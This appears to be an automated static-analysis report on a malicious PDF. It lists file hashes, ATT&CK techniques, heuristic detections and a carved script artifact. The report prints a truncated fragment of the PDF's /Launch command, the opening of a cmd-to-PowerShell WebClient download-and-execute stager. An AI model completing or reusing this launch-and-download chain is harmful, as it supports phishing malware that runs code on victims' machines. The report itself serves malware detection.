Malicious PDF — malware analysis report

Static analysis result for SHA-256 a6d7255a487ac60d…

MALICIOUS

PDF

1.42 MB First seen: 2021-10-05
MD5: 6c0d4a73428f4b63ba53833503a63eac SHA-1: e01a0c806dc59b6eeb6a28724303bf3cdbeb894b SHA-256: a6d7255a487ac60d275a67c9f844512d9959c94887363cc8636d9fdda2bc35f0
214 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains an OpenAction that triggers a Launch action, which in turn executes a command. This command appears to be designed to download and execute a PowerShell script. The embedded script itself is truncated but indicates a PowerShell command is intended. The ML classifier also strongly flagged this PDF as malicious.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9978

Heuristics 7

  • OpenAction trigger high PDF_OPENACTION
    PDF has an /OpenAction that launches, submits, or opens an external target
  • Launch action high PDF_LAUNCH
    PDF contains a /Launch action with an unresolved or extension-less target — treat as potentially dangerous
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • /Launch action target: CMD high PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient'.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILED
    The cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: PSEOF. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_0016b9e3.bin pdf-embedded-script PDF decompressed stream script payload at offset 0x16B9E3 67 bytes
SHA-256: 9a59423e5594f113069cb1ae8016ea792da6223e81f7dc7bb4f77a0c57f0af41
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script
/c cD  %tEMP% &@echo powershell -Command "(New-Object Net.WebClient

Open this report in the interactive analyzer, or submit your own file for analysis.